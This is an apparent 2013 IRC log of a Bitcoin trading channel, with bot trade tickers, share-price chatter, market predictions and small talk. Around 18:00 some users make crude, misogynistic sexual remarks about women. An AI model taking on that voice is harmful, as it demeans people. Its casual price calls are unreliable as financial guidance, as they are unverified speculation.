16:16:35 "Sorry, you can only offer your shares up for this price" May 24 16:16:43 why would i peg my price? So i can lose? May 24 16:16:45 also May 24 16:16:55 pegging makes no sense May 24 16:16:55 since when did arb cause volatility? May 24 16:16:59 let arb bots do it May 24 16:17:03 ThickAsThieves: they dont May 24 16:17:04 they reduce it May 24 16:17:08 exactly May 24 16:17:34 dude just saw the best price somewhere else but couldnt afford a whole share May 24 16:17:53 are you charging a fee for TAT? May 24 16:18:00 5% of divs May 24 16:18:06 you know what you should do? May 24 16:18:06 which is a pittance May 24 16:18:11 what May 24 16:18:11 buy DMC shares and trade for the AM May 24 16:18:15 i try May 24 16:18:23 they are too spensive May 24 16:18:40 yeah but you can sell them as TAT shares at whatever price you want May 24 16:18:48 eventually the market will meet it May 24 16:18:51 I saw that, it didn't even come up to a whole BTC for this div, at 9 btc paid out May 24 16:19:17 which reminds me, I have another 14 BTC to pay out as div for DMC May 24 16:19:20 It was like.. .45btc if my math is right May 24 16:19:33 It's not a bad management fee at all May 24 16:19:46 [BTCTC] [ASICMINER-PT] 38 @ 2.505 = 95.19 BTC [-] May 24 16:21:23 unfortunately, many perceive the stock as being worth 5% less overall May 24 16:21:37 when it isn't as simple as that May 24 16:23:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.02535 BTC [-] May 24 16:23:33 [BTCTC] [TAT.ASICMINER] 49 @ 0.025314 = 1.2404 BTC [-] May 24 16:23:35 [BTCTC] [TAT.ASICMINER] 31 @ 0.025314 = 0.7847 BTC [-] May 24 16:23:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.02531 = 0.0506 BTC [-] May 24 16:23:39 [BTCTC] [TAT.ASICMINER] 19 @ 0.02531 = 0.4809 BTC [-] May 24 16:23:41 [BTCTC] [TAT.ASICMINER] 70 @ 0.0253 = 1.771 BTC [-] May 24 16:23:45 [BTCTC] [TAT.ASICMINER] 18 @ 0.0253 = 0.4554 BTC [-] May 24 16:23:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.0252 = 0.252 BTC [-] May 24 16:25:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02579 BTC [+] May 24 16:26:17 lolwhat. May 24 16:27:04 i was referring to TAT.AM, not DMC May 24 16:27:47 [BTCTC] [S.DICE-PT] 1714 @ 0.00287 = 4.9192 BTC [-] May 24 16:28:24 [BTCTC] [S.DICE-PT] 2877 @ 0.00288 = 8.2858 BTC [+] May 24 16:30:25 [BTCTC] [TAT.ASICMINER] 100 @ 0.02513 = 2.513 BTC [-] May 24 16:30:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.02513 = 0.2513 BTC [-] May 24 16:30:30 [BTCTC] [TAT.ASICMINER] 11 @ 0.02579 = 0.2837 BTC [+] May 24 16:30:36 [BTCTC] [TAT.ASICMINER] 27 @ 0.02579 = 0.6963 BTC [+] May 24 16:30:56 [BTCTC] [ASICMINER-PT] 10 @ 2.525 = 25.25 BTC [+] May 24 16:31:02 [HAVELOCK] [ASICM] 9 @ 0.02579 = 0.2321 BTC [-] May 24 16:31:58 [BTCTC] [TAT.ASICMINER] 8 @ 0.02575 = 0.206 BTC [-] May 24 16:32:02 [HAVELOCK] [ASICM] 1 @ 0.02579 BTC [-] May 24 16:34:10 ;;bc,24hprc May 24 16:34:10 125.12 May 24 16:36:04 t'sup May 24 16:36:53 lol 129 May 24 16:37:22 yo May 24 16:37:33 does anyone here have a link to the coinlab/mtgox contract May 24 16:38:02 [HAVELOCK] [ASICM] 6 @ 0.02579 = 0.1547 BTC [-] May 24 16:39:16 ;google original contract between Coinlab and MtGox May 24 16:39:20 ;;google original contract between Coinlab and MtGox May 24 16:39:21 CoinLab Sues MtGox | Bitcoin MagazineBitcoin Magazine: ; CoinLab sues MtGox : Bitcoin - Reddit: ; CoinLab suing MtGox for $75 milliion? - Bitcoin Forum: May 24 16:39:44 it's in the first link May 24 16:39:57 http://www.scribd.com/doc/139181173/Contract-between-Mt-Gox-and-Coinlab May 24 16:41:32 [BTCTC] [PAJKA.BOND] 3 @ 0.109988 = 0.33 BTC [+] May 24 16:42:34 [BTCTC] [S.MPOE-PT] 1433 @ 0.0007 = 1.0031 BTC [+] May 24 16:42:34 jborkl: you there? send me a pm when you can May 24 16:42:35 [BTCTC] [S.MPOE-PT] 40 @ 0.0007 = 0.028 BTC [+] May 24 16:42:37 [BTCTC] [S.MPOE-PT] 2427 @ 0.0007 = 1.6989 BTC [+] May 24 16:42:54 [BTCTC] [TAT.ASICMINER] 9 @ 0.02565 = 0.2309 BTC [-] May 24 16:43:27 [BTCTC] [S.DICE-PT] 1 @ 0.003 BTC [+] May 24 16:43:29 [BTCTC] [S.DICE-PT] 9 @ 0.003 = 0.027 BTC [+] May 24 16:43:31 [BTCTC] [S.DICE-PT] 600 @ 0.003 = 1.8 BTC [+] May 24 16:43:33 [BTCTC] [S.DICE-PT] 100 @ 0.003 = 0.3 BTC [+] May 24 16:43:41 ThickAsThieves: thank you, googled, but didn't think about a simple CTRL+F on the reddit thread May 24 16:45:45 np May 24 16:46:06 i havent had my coffee yet, acting like a web-jerk May 24 16:48:02 [HAVELOCK] [HIM] 1 @ 2.3201 BTC [-] May 24 16:48:08 TAT.AM has reached 2000 issued shares today :) May 24 16:48:31 only 3000 to go! May 24 16:50:02 [HAVELOCK] [ASICM] 90 @ 0.02579 = 2.3211 BTC [-] May 24 16:51:11 ThickAsThieves: i'd rather deal with jerks than with morons May 24 16:51:28 technically less than 3000, as I still hold unissued shares May 24 16:51:33 and god knows we have enough idiots May 24 16:51:38 hehe May 24 16:51:52 I myself stand on the divinding line, one foot on each side May 24 16:52:53 hold on its gonna be a rough ride May 24 16:53:00 nobody knows where this whole bitcoin thing is going May 24 16:53:57 that may me both good and bad May 24 16:53:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.025649 BTC [-] May 24 16:55:25 [BTCTC] [ASICMINER-PT] 1 @ 2.505001 BTC [-] May 24 16:55:52 ;;ticker May 24 16:56:02 [HAVELOCK] [ASICM] 6 @ 0.0252 = 0.1512 BTC [-] May 24 16:56:11 ;;goxlag May 24 16:56:25 BTCUSD ticker | Best bid: 129.80358, Best ask: 129.86464, Bid-ask spread: 0.06106, Last trade: 129.86464, 24 hour volume: 26104.88100134, 24 hour low: 125.11000, 24 hour high: 129.80358, 24 hour vwap: 127.10958 May 24 16:56:28 MtGox lag is 0.465429 seconds. During this time, light travels 0.000932714504797 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). May 24 16:56:42 ;;nethash May 24 16:56:42 92536.5657163 May 24 16:56:43 Error: "gribblelag" is not a valid command. May 24 16:56:45 [BTCTC] [ASICMINER-PT] 1 @ 2.524 BTC [+] May 24 16:56:52 ;;amhash May 24 16:56:52 Error: "amhash" is not a valid command. May 24 16:56:55 :P May 24 16:59:36 ;;asks 129.99 May 24 16:59:43 There are currently 576.38985 bitcoins offered at or under 129.99 USD, worth 74924.3917777 USD in total. | Data vintage: 0.0110 seconds May 24 16:59:47 oh lawd May 24 17:00:28 There are currently 4075.2949 bitcoins offered at or under 130.0 USD, worth 529781.88109 USD in total. | Data vintage: 37.7323 seconds May 24 17:00:32 http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected May 24 17:00:33 crazy chart May 24 17:00:37 why cant these speculators be reasonable May 24 17:00:45 like .50 a day May 24 17:00:54 that's plenty :) May 24 17:01:21 lmao May 24 17:01:47 there are a lot of unhappy buyers with a weighted average buy-in >160 May 24 17:02:36 i think if we ever get close to that we're gonna see a massive crash again as they dump May 24 17:02:57 bubbles will be the way until we get more people in this game May 24 17:03:17 fiat500: nop, these people don't hold any significant amounts May 24 17:03:35 a small drop maybe May 24 17:03:56 i still dont get the people that bought from me at 250+ May 24 17:04:01 i even told them it was a bad idea May 24 17:04:08 but they insisted i take their money May 24 17:04:08 topace: lol May 24 17:04:11 so i did May 24 17:04:16 little jimmy that bought at 230 because he saw it on msnbc didn't really buy a whole lot May 24 17:04:18 Scrat: u have numbers on that? May 24 17:04:28 fiat500: source: my ass May 24 17:04:33 i know people who bought 100+ btc at 160 May 24 17:04:37 ouch May 24 17:04:53 i stopped paying new cash at $68 May 24 17:05:08 seems i called it about right May 24 17:05:13 i stopped buying at 12EUR May 24 17:05:13 [BTCTC] [S.DICE-PT] 1 @ 0.00305 BTC [+] May 24 17:05:21 :-) May 24 17:05:32 nice May 24 17:06:05 you must be filthy rich davout May 24 17:06:07 bitcoin will go higher May 24 17:06:20 Scrat: believe me i'm not May 24 17:06:50 [BTCTC] [TAT.ASICMINER] 9 @ 0.02565 = 0.2309 BTC [+] May 24 17:07:18 at current rates i can live comfortably a couple of years on my savings, but in my definition being filthy rich is like "i'll never work ever again, hmmm, which maserati should i get" May 24 17:07:39 [BTCTC] [S.DICE-PT] 3 @ 0.00305 = 0.0092 BTC [+] May 24 17:08:07 that's like 10 million May 24 17:08:09 or 5 May 24 17:08:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.025749 BTC [+] May 24 17:09:33 [BTCTC] [BITVPS] 1 @ 0.000857 BTC [-] May 24 17:09:41 [BTCTC] [BTC-BOND] 93 @ 0.01019 = 0.9477 BTC [+] May 24 17:09:47 [BTCTC] [BITVPS] 1 @ 0.000857 BTC [-] May 24 17:10:50 [BTCTC] [TAT.ASICMINER] 52 @ 0.025749 = 1.3389 BTC [+] May 24 17:12:01 [BTCTC] [PAJKA.BOND] 10 @ 0.109988 = 1.0999 BTC [+] May 24 17:12:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.02575 BTC [+] May 24 17:12:28 [BTCTC] [PAJKA.BOND] 20 @ 0.109988 = 2.1998 BTC [+] May 24 17:14:02 [HAVELOCK] [HIM] 1 @ 2.3201 BTC [-] May 24 17:14:26 count them eggs! May 24 17:15:01 I prefer chickens. May 24 17:15:02 [HAVELOCK] [ASICM] 6 @ 0.0257 = 0.1542 BTC [+] May 24 17:15:26 [BTCTC] [TAT.ASICMINER] 93 @ 0.025749 = 2.3947 BTC [-] May 24 17:15:47 i prefer cats May 24 17:16:38 In my definition, I've never worked a day in my life. May 24 17:16:59 cats is goods May 24 17:17:03 [HAVELOCK] [ASICM] 4 @ 0.02579 = 0.1032 BTC [+] May 24 17:17:10 im bored May 24 17:17:42 make something May 24 17:17:48 ive done literally everythign i can do aside from day trade May 24 17:18:01 [HAVELOCK] [VTX] 4 @ 0.444 = 1.776 BTC [+] May 24 17:18:08 already up 50% from last week May 24 17:18:15 make a chan bot that shows nethash, 3-day estimate and fukll stats in one May 24 17:18:20 so i dont have to do this May 24 17:18:23 ;;nethash May 24 17:18:23 92536.5657163 May 24 17:18:28 ;;estimate May 24 17:18:29 Next difficulty estimate | 12047938.3143 based on data since last change | 12927011.6408 based on data for last three days May 24 17:18:31 ;;bc,stats May 24 17:18:32 Current Blocks: 237698 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 189 blocks | Next Difficulty In About: 1 day, 1 hour, 46 minutes, and 21 seconds | Next Difficulty Estimate: 12047938.3143 | Estimated Percent Change: 7.6934 May 24 17:18:33 is there a bot for btct? May 24 17:18:47 i mean a pull bot May 24 17:18:57 BF needs a bot May 24 17:19:12 but kako and ukto are still arm wrestling May 24 17:19:16 lol May 24 17:20:02 [HAVELOCK] [ASICM] 11 @ 0.02579 = 0.2837 BTC [+] May 24 17:20:27 i want it in here May 24 17:20:28 more channel spam! May 24 17:20:38 i also want a BTCTC chan May 24 17:21:28 cyberers May 24 17:21:56 16/f/fl May 24 17:22:33 [BTCTC] [S.DICE-PT] 6 @ 0.00305 = 0.0183 BTC [+] May 24 17:22:35 [BTCTC] [S.DICE-PT] 1 @ 0.00305 BTC [+] May 24 17:26:14 [HAVELOCK] [ASICM] 1 @ 0.02579 BTC [+] May 24 17:28:23 I'd join a btctc channel May 24 17:35:02 [HAVELOCK] [ASICM] 19 @ 0.02579 = 0.49 BTC [+] May 24 17:37:02 [HAVELOCK] [ASICM] 116 @ 0.02579 = 2.9916 BTC [+] May 24 17:38:50 [BTCTC] [TAT.ASICMINER] 79 @ 0.0257 = 2.0303 BTC [-] May 24 17:41:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.0256 = 0.128 BTC [-] May 24 17:42:02 [HAVELOCK] [ASICM] 30 @ 0.0255 = 0.765 BTC [-] May 24 17:42:08 [BTCTC] [TAT.ASICMINER] 5 @ 0.02575 = 0.1288 BTC [+] May 24 17:43:51 [BTCTC] [GSDPT] 1 @ 0.00255 BTC [-] May 24 17:46:02 [HAVELOCK] [ASICM] 25 @ 0.02579 = 0.6448 BTC [+] May 24 17:47:01 [HAVELOCK] [ASICM] 23 @ 0.02579 = 0.5932 BTC [+] May 24 17:49:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.02575 BTC [+] May 24 17:50:26 I'm a bitcoin predator May 24 17:50:29 but I've never seen a bitcoin in the wild soo, i'm not long for this world. May 24 17:50:43 my only regret, is that I have bonitis. May 24 17:51:22 it's a confidence matter, low confidence means they go for low-hanging 'fruit' May 24 17:51:35 i go for mediocre hanging fruit. May 24 17:51:47 working my way up to top of the tree fruit. May 24 17:52:09 although I'm discovering the more confidence I have the less I want a relationship. May 24 17:52:36 [BTCTC] [S.DICE-PT] 1 @ 0.00305 BTC [+] May 24 17:52:44 There are currently 5263.6063 bitcoins offered at or under 130.0 USD, worth 684109.733092 USD in total. | Data vintage: 0.0108 seconds May 24 17:52:48 truffles, no way. May 24 17:53:19 ;;bids 128.5 May 24 17:53:19 There are currently 40.736639 bitcoins demanded at or over 128.5 USD, worth 5234.65814677 USD in total. | Data vintage: 35.0680 seconds May 24 17:53:36 what is what? May 24 17:53:43 [BTCTC] [S.DICE-PT] 3 @ 0.00305 = 0.0092 BTC [+] May 24 17:53:50 [BTCTC] [ASICMINER-PT] 1 @ 2.517 BTC [-] May 24 17:54:39 no no, just don't want to be with dramatic low-confidence people, it sucks the energy out of me. it's a waste of time. I can't help them and they will only drag me down. May 24 17:54:54 [BTCTC] [TAT.ASICMINER] 38 @ 0.02575 = 0.9785 BTC [+] May 24 17:55:01 [HAVELOCK] [ASICM] 2 @ 0.02579 = 0.0516 BTC [+] May 24 17:55:12 well, it's true. May 24 17:57:53 [BTCTC] [S.DICE-PT] 1 @ 0.00305 BTC [+] May 24 17:58:03 meh May 24 17:58:06 I go for the smart ones May 24 17:58:14 I love a smart chick May 24 17:59:02 [HAVELOCK] [ASICM] 116 @ 0.02579 = 2.9916 BTC [+] May 24 18:00:30 truffles, they go for dumb/insecure yes, but only because it's easy. The only feeling they get out of it is a blow job. May 24 18:00:40 I don't think superior is the correct word for it. May 24 18:01:02 [HAVELOCK] [ASICM] 68 @ 0.02579 = 1.7537 BTC [+] May 24 18:01:08 most of the time, actually. hell, I'll settle for a handy. May 24 18:01:10 [BTCTC] [BASIC-MINING] 1 @ 0.600031 BTC [-] May 24 18:01:12 [BTCTC] [BASIC-MINING] 1 @ 0.60003 BTC [-] May 24 18:01:14 [BTCTC] [BASIC-MINING] 1 @ 0.6 BTC [-] May 24 18:01:22 i don't always have the energy for sexathons May 24 18:01:36 [BTCTC] [S.MPOE-PT] 73 @ 0.0007 = 0.0511 BTC [+] May 24 18:01:52 women are simple creatures too. they just want a good rogering. May 24 18:02:09 [BTCTC] [ASICMINER-PT] 1 @ 2.516 BTC [-] May 24 18:02:17 [BTCTC] [S.MPOE-PT] 50 @ 0.000725 = 0.0363 BTC [+] May 24 18:02:17 truffles, that is why I don't have the energy. I did 4 hours of intense training last night, my knees barely support me today. May 24 18:02:57 [BTCTC] [S.MPOE-PT] 30 @ 0.00074 = 0.0222 BTC [+] May 24 18:03:21 or I like colorful terms. May 24 18:03:48 would you prefer I said "they jsut want their hairy axe wound pounded"? May 24 18:03:59 would that make me young again? May 24 18:04:02 [HAVELOCK] [ASICM] 125 @ 0.025795 = 3.2244 BTC [+] May 24 18:04:10 because I'm all for returning to my youth May 24 18:04:15 I didn't get enough sex in my teens May 24 18:04:27 fucking catholics May 24 18:04:53 lucky?!?!?!/ May 24 18:04:58 yes, overrated. May 24 18:05:02 [HAVELOCK] [ASICM] 1 @ 0.025795 BTC [+] May 24 18:05:06 [BTCTC] [TAT.ASICMINER] 16 @ 0.02574 = 0.4118 BTC [-] May 24 18:05:07 but it was not in my teens May 24 18:05:35 what's an STD? May 24 18:05:39 ;) May 24 18:06:22 i know, I'm more worried about resistant pathogens and genetic disorder being activated my modern chemicals/molecules May 24 18:06:48 [BTCTC] [GSDPT] 99 @ 0.00254 = 0.2515 BTC [-] May 24 18:06:50 that and my bitcoins. May 24 18:08:32 lol, no doubt. as long as I can keep taking my cut, I don't care. it may not be BTC that is the future currecny, but one of it's cousins. May 24 18:08:49 i realize that. nobody can know for sure. May 24 18:09:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.02574 = 0.2574 BTC [-] May 24 18:09:24 frankly, I wonder where the development will come from. What if the 'devs' all go to a conference and their bus collapses through the I-5 bridge? May 24 18:10:00 sure, the dev bus. they totally have those. May 24 18:10:08 oh ya, that's was horrible. May 24 18:10:39 Sea of Ostohk had an 8.2 magnitude earthquake, possiblity for tsunami in pacific rim. May 24 18:12:29 [BTCTC] [BITVPS] 2 @ 0.000857 = 0.0017 BTC [-] May 24 18:13:31 [BTCTC] [TAT.ASICMINER] 55 @ 0.0254 = 1.397 BTC [-] May 24 18:13:37 well I don't know where you are and I still talk to you. ;P May 24 18:13:55 deadweasel: it's a deep one though May 24 18:13:57 [BTCTC] [TAT.ASICMINER] 9 @ 0.02531 = 0.2278 BTC [-] May 24 18:14:01 deadweasel: would not be too concerned May 24 18:14:15 ah, I didn't know joecool May 24 18:14:43 yeah it's ~610KM under the ground May 24 18:15:21 the 5.7 in cali was probably more noticable at only 11KM of depth May 24 18:18:09 [BTCTC] [ASICMINER-PT] 1 @ 2.517 BTC [+] May 24 18:18:15 the only one i felt was the one in VA a couple years ago May 24 18:18:26 it traveled pretty far on the east coast May 24 18:21:58 [BTCTC] [ASICMINER-PT] 1 @ 2.516 BTC [-] May 24 18:24:17 [BTCTC] [TAT.ASICMINER] 22 @ 0.025121 = 0.5527 BTC [-] May 24 18:24:18 [BTCTC] [TAT.ASICMINER] 83 @ 0.02511 = 2.0841 BTC [-] May 24 18:24:20 [BTCTC] [TAT.ASICMINER] 9 @ 0.025105 = 0.2259 BTC [-] May 24 18:24:29 [BTCTC] [TAT.ASICMINER] 9 @ 0.025103 = 0.2259 BTC [-] May 24 18:24:31 [BTCTC] [TAT.ASICMINER] 11 @ 0.0251 = 0.2761 BTC [-] May 24 18:24:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.0251 = 0.251 BTC [-] May 24 18:25:05 [BTCTC] [TAT.ASICMINER] 68 @ 0.0251 = 1.7068 BTC [-] May 24 18:25:24 [BTCTC] [TAT.ASICMINER] 19 @ 0.02555 = 0.4855 BTC [+] May 24 18:25:40 I've only ever been in a 4.2 here in maine last year. I thought tanks were surrounding the building. May 24 18:25:44 they were not May 24 18:33:35 hello btcworld May 24 18:33:42 ;;bids 0 May 24 18:33:46 ;asks 11111111111111111 May 24 18:33:49 There are currently 13913764 bitcoins demanded at or over 0.0 USD, worth 19244166.833 USD in total. | Data vintage: 0.0625 seconds May 24 18:33:51 ;;asks 111111111111111 May 24 18:33:52 There are currently 103683.56 bitcoins offered at or under 1.11111111111e+14 USD, worth 2.74759003559e+13 USD in total. | Data vintage: 2.6013 seconds May 24 18:34:23 [MPEX] [S.MPOE] 17600 @ 0.00071354 = 12.5583 BTC [+] May 24 18:37:57 BTCUSD ticker | Best bid: 129.05240, Best ask: 129.22000, Bid-ask spread: 0.16760, Last trade: 129.05240, 24 hour volume: 27992.05300410, 24 hour low: 125.11000, 24 hour high: 129.99990, 24 hour vwap: 127.64484 May 24 18:41:27 [BTCTC] [TAT.ASICMINER] 20 @ 0.02549 = 0.5098 BTC [-] May 24 18:44:13 something is on the way :http://blockchained.com/depth_mtgox_15d.png May 24 18:47:33 [BTCTC] [RSM] 1 @ 0.01139 BTC [+] May 24 18:47:35 [BTCTC] [RSM] 2 @ 0.0114 = 0.0228 BTC [+] May 24 18:47:40 [BTCTC] [RSM] 90 @ 0.0119 = 1.071 BTC [+] May 24 18:47:43 whats your interpretation? May 24 18:48:19 [BTCTC] [RSM] 62 @ 0.012 = 0.744 BTC [+] May 24 18:48:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.02549 = 0.051 BTC [-] May 24 18:48:21 [BTCTC] [RSM] 100 @ 0.01239 = 1.239 BTC [+] May 24 18:48:22 [BTCTC] [RSM] 100 @ 0.01249 = 1.249 BTC [+] May 24 18:49:46 [BTCTC] [RSM] 100 @ 0.01269 = 1.269 BTC [+] May 24 18:49:48 [BTCTC] [RSM] 5 @ 0.0127 = 0.0635 BTC [+] May 24 18:49:50 [BTCTC] [RSM] 100 @ 0.01279 = 1.279 BTC [+] May 24 18:50:48 [BTCTC] [RSM] 500 @ 0.0128 = 6.4 BTC [+] May 24 18:52:02 [HAVELOCK] [ASICM] 5 @ 0.0256 = 0.128 BTC [-] May 24 18:52:15 [MPEX] [S.MPOE] 2439 @ 0.00071354 = 1.7403 BTC [+] May 24 18:53:41 could have a cigarette hiding in there May 24 18:55:21 [BTCTC] [ASICMINER-PT] 2 @ 2.5123 = 5.0246 BTC [-] May 24 18:55:29 20somethings problems May 24 18:56:17 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 24 18:56:19 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 24 18:57:58 [BTCTC] [COGNITIVE] 4 @ 0.29 = 1.16 BTC [+] May 24 18:58:15 TAT i have no clue :D May 24 19:00:39 first time i see the 2 line dropping in the same way, i'm confused so i sold half of my btc and bought btc with the money ! make sens no ? May 24 19:03:41 selling half might make sense May 24 19:03:52 but buying btc right after is confusing me May 24 19:04:02 [HAVELOCK] [ASICM] 1 @ 0.02572 BTC [+] May 24 19:04:11 [BTCTC] [B.YABMC] 2 @ 0.017 = 0.034 BTC [+] May 24 19:04:11 just kidding sorry May 24 19:04:15 [BTCTC] [B.YABMC] 18 @ 0.01744 = 0.3139 BTC [+] May 24 19:07:31 ;;asks 1111111111111111111111 May 24 19:07:32 There are currently 103988.02 bitcoins offered at or under 1.11111111111e+21 USD, worth 2.74759004097e+13 USD in total. | Data vintage: 0.0408 seconds May 24 19:07:48 [BTCTC] [PAJKA.BOND] 7 @ 0.109988 = 0.7699 BTC [+] May 24 19:08:50 ;;ticker May 24 19:08:50 BTCUSD ticker | Best bid: 129.02000, Best ask: 129.49990, Bid-ask spread: 0.47990, Last trade: 129.49990, 24 hour volume: 28129.22128504, 24 hour low: 125.11000, 24 hour high: 129.99990, 24 hour vwap: 127.70212 May 24 19:20:02 [HAVELOCK] [ASICM] 100 @ 0.02572 = 2.572 BTC [+] May 24 19:20:45 [BTCTC] [COGNITIVE] 10 @ 0.299994 = 2.9999 BTC [+] May 24 19:21:52 [BTCTC] [COGNITIVE] 10 @ 0.322 = 3.22 BTC [+] May 24 19:22:29 [MPEX] [S.MPOE] 2463 @ 0.00071365 = 1.7577 BTC [+] May 24 19:23:10 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [-] May 24 19:24:50 [BTCTC] [ASICMINER-PT] 2 @ 2.4 = 4.8 BTC [-] May 24 19:25:55 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 24 19:25:57 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] May 24 19:26:15 [BTCTC] [S.DICE-PT] 4 @ 0.00305 = 0.0122 BTC [+] May 24 19:26:16 [BTCTC] [S.DICE-PT] 10 @ 0.0031 = 0.031 BTC [+] May 24 19:26:18 [BTCTC] [S.DICE-PT] 10 @ 0.00315 = 0.0315 BTC [+] May 24 19:28:03 [HAVELOCK] [ASICM] 1 @ 0.02572 BTC [+] May 24 19:28:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.02555 BTC [+] May 24 19:28:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02555 BTC [+] May 24 19:29:27 There are currently 3311.0913 bitcoins offered at or under 130.0 USD, worth 430413.87183 USD in total. | Data vintage: 0.0120 seconds May 24 19:31:06 [BTCTC] [ASICMINER-PT] 1 @ 2.510999 BTC [+] May 24 19:32:03 [BTCTC] [TAT.ASICMINER] 8 @ 0.02555 = 0.2044 BTC [+] May 24 19:32:23 Chaang, help me understand Cognitive a bit, if you please... May 24 19:32:40 I understand they have stuff on order and favorably so. May 24 19:32:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.02549 BTC [-] May 24 19:33:06 I know what you've aid about the guy running the operation, and let's assume I trust your judgement on that. May 24 19:34:07 Hello May 24 19:34:17 What is it about the company in terms of revenue that could cause it to rise in value? It has not yielded any significant dividends so far and even with new equipment, it still would only compete with any other mining operation that gets the same equipment. May 24 19:34:47 I'm not saying it's good or bad, just trying to understand. May 24 19:35:43 But let's assume it works out, both of them to be optimistic. What makes this asset different from other assets that also buys BFL and Avalons? May 24 19:36:02 [HAVELOCK] [ASICM] 1 @ 0.02572 BTC [+] May 24 19:36:44 There are currently 3042.5977 bitcoins offered at or under 130.0 USD, worth 395536.480549 USD in total. | Data vintage: 8.2836 seconds May 24 19:36:54 [BTCTC] [ASICMINER-PT] 1 @ 2.509 BTC [-] May 24 19:36:57 Sure, which is an advantage short-term until BFL/Avalon/KnC/Whoever ships en masse. May 24 19:37:20 So it's a trust thing, not a fundamental valuation. That's fine, I understand. Thanks for your input :-) May 24 19:38:13 Neither am I, I'm just trying to learn about the assets and what brings people to go in any direction. May 24 19:39:04 There are currently 2329.5675 bitcoins offered at or under 130.0 USD, worth 302843.726974 USD in total. | Data vintage: 5.2856 seconds May 24 19:39:17 BTCUSD ticker | Best bid: 130.00001, Best ask: 130.01570, Bid-ask spread: 0.01569, Last trade: 130.00001, 24 hour volume: 32267.69883300, 24 hour low: 125.11000, 24 hour high: 130.01570, 24 hour vwap: 128.04359 May 24 19:39:30 ?? May 24 19:39:41 Clark moody shows trades >130... May 24 19:40:36 There should be a ;;slap command. May 24 19:40:48 I thought there was May 24 19:40:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.02554 = 0.0511 BTC [+] May 24 19:40:56 ;;slap furuknap May 24 19:41:00 ;;slap furuknap May 24 19:41:03 ;;slap furuknap May 24 19:41:19 ;;slap his genitals May 24 19:44:02 [HAVELOCK] [ASICM] 100 @ 0.02572 = 2.572 BTC [+] May 24 19:44:40 fuckin kinds May 24 19:44:48 !r WILLdude May 24 19:44:51 see that. May 24 19:44:54 [BTCTC] [ASICMINER-PT] 1 @ 2.480001 BTC [-] May 24 19:44:55 [BTCTC] [ASICMINER-PT] 8 @ 2.48 = 19.84 BTC [-] May 24 19:46:10 [BTCTC] [TAT.ASICMINER] 20 @ 0.02528 = 0.5056 BTC [-] May 24 19:50:05 All EMAs still pointing upwards. 132 isn't going to be much of an issue. May 24 19:50:47 EMAs by definition cannot predict the future May 24 19:51:07 [HAVELOCK] [SDICE] 7 @ 0.2439 = 1.7073 BTC [+] May 24 19:53:02 [HAVELOCK] [HIM] 2 @ 2.4749 = 4.9498 BTC [+] May 24 19:54:01 [HAVELOCK] [ASICM] 9 @ 0.02572 = 0.2315 BTC [+] May 24 19:54:57 ;;ticker May 24 19:54:59 BTCUSD ticker | Best bid: 131.74448, Best ask: 131.99999, Bid-ask spread: 0.25551, Last trade: 131.74448, 24 hour volume: 35059.91485832, 24 hour low: 125.11000, 24 hour high: 132.00000, 24 hour vwap: 128.33951 May 24 19:55:06 A lot of people still trade on EMAs, as do bots. It's no clear prediction, but an indication. The world could end tomorrow, you don't stay away from trading just because of that. May 24 19:55:28 this will fizzle before day's end May 24 19:55:31 we'll be back at 128-129 May 24 19:55:36 [BTCTC] [CRYPTO-TRADE] 3 @ 0.17 = 0.51 BTC [-] May 24 19:56:01 [HAVELOCK] [ASICM] 100 @ 0.0257945 = 2.5795 BTC [+] May 24 19:56:50 sure buyt we were at 123 two days ago May 24 19:56:58 speculators gon gpeculate May 24 19:57:33 either way, i'm happy to see an uptrend May 24 19:58:03 [HAVELOCK] [ASICM] 241 @ 0.02572 = 6.1985 BTC [-] May 24 19:59:01 [HAVELOCK] [SDICE] 14 @ 0.244 = 3.416 BTC [+] May 24 20:01:01 assuming youre holding coins, not cash May 24 20:03:11 ;;ticker May 24 20:03:12 BTCUSD ticker | Best bid: 131.70000, Best ask: 131.75315, Bid-ask spread: 0.05315, Last trade: 131.70000, 24 hour volume: 36093.45621082, 24 hour low: 125.11000, 24 hour high: 132.02274, 24 hour vwap: 128.46488 May 24 20:06:09 [HAVELOCK] [ASICM] 31 @ 0.025401 = 0.7874 BTC [-] May 24 20:06:09 [HAVELOCK] [ASICM] 345 @ 0.02540001 = 8.763 BTC [-] May 24 20:06:10 [HAVELOCK] [ASICM] 14 @ 0.0254 = 0.3556 BTC [-] May 24 20:06:10 [HAVELOCK] [ASICM] 110 @ 0.0254 = 2.794 BTC [-] May 24 20:07:27 ;;next May 24 20:07:28 bullish channel targets/resistances: 128-129 | breakout targets: 132, 140-145, 172 | support: 123-125 | #bitcoin [Fri, 24 May 2013 07:06:51 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 10 hours and 36 seconds ago May 24 20:08:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.02545 = 0.0509 BTC [+] May 24 20:09:16 [BTCTC] [S.DICE-PT] 1 @ 0.00315 BTC [+] May 24 20:09:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.02545 BTC 